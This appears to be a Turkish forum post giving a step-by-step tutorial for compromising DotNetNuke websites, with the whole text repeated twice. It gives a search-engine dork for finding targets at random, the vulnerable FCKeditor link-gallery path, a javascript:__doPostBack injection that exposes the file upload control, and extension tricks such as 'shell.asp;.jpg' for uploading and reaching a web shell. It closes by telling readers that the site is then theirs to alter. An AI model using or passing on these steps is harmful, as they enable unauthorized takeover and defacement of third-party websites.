Acı çekiyorsan Nefes aldığıını unutmazsın - Reply
DNN açılımı bilmeyenler için : dotnetnuke
evet artık anlatıma geçiyorum.
Şimdi ilk olarak arama motorumuzda aratacağımız
DORK : inurl:/tabid/36/language/en-US/Default.aspx
karşımıza gelen herhangi bir siteyi seçiyoruz.
siteyi açtıktan sonra; /Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx kodumuzu ekliyoruz.Yani;
www.hedefsite.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
bu şekilde tıkladığımızda karşımıza Link Gallery adı altında URL ve use selec link seçenekleri gelcek.
DİKKAT!
Şimdi arkadaşlar URL nin yanında karşımıza 3 tane link tipi gelmesi lazım. Eğer bu 3 link tipi gelmiyorsa sitede açık yoktur.
- URL ( A Link To An External Resource )
- Page ( A Page On Your Site )
- File ( A File On Your Site )
Yukarıda vermiş olduğum link tiplerinden 3. Yani 'File' ı seçiyoruz.Daha sonra sitemiz neydi?
www.hedefsite.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
bu URL in tamamını silip URL kısmına j a v a s c r i p t :__doPostBack('ctlURL$cmdUpload','') (j a v a s c r i p t : arasında boşluk olmayacak.) yazıyoruz ve enter a tıklıyoruz.
Evet sıra geldi shell imizi upload etmeye. Arkadaşlar shell imizi .php ya da .php;.txt olarak siteye yükleyemiyorsak .asp;.txt olarak yüklüyoruz.
Sıra geldi son aşamaya;
www.hedefsite.com/portals/0/shell.asp;.jpg
evet shell imizi de upload ettik ve site elinizde istediğiniz değişikliği yapabilirsiniz.
evet artık anlatıma geçiyorum.
Şimdi ilk olarak arama motorumuzda aratacağımız
DORK : inurl:/tabid/36/language/en-US/Default.aspx
karşımıza gelen herhangi bir siteyi seçiyoruz.
siteyi açtıktan sonra; /Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx kodumuzu ekliyoruz.Yani;
www.hedefsite.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
bu şekilde tıkladığımızda karşımıza Link Gallery adı altında URL ve use selec link seçenekleri gelcek.
DİKKAT!
Şimdi arkadaşlar URL nin yanında karşımıza 3 tane link tipi gelmesi lazım. Eğer bu 3 link tipi gelmiyorsa sitede açık yoktur.
- URL ( A Link To An External Resource )
- Page ( A Page On Your Site )
- File ( A File On Your Site )
Yukarıda vermiş olduğum link tiplerinden 3. Yani 'File' ı seçiyoruz.Daha sonra sitemiz neydi?
www.hedefsite.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
bu URL in tamamını silip URL kısmına j a v a s c r i p t :__doPostBack('ctlURL$cmdUpload','') (j a v a s c r i p t : arasında boşluk olmayacak.) yazıyoruz ve enter a tıklıyoruz.
Evet sıra geldi shell imizi upload etmeye. Arkadaşlar shell imizi .php ya da .php;.txt olarak siteye yükleyemiyorsak .asp;.txt olarak yüklüyoruz.
Sıra geldi son aşamaya;
www.hedefsite.com/portals/0/shell.asp;.jpg
evet shell imizi de upload ettik ve site elinizde istediğiniz değişikliği yapabilirsiniz.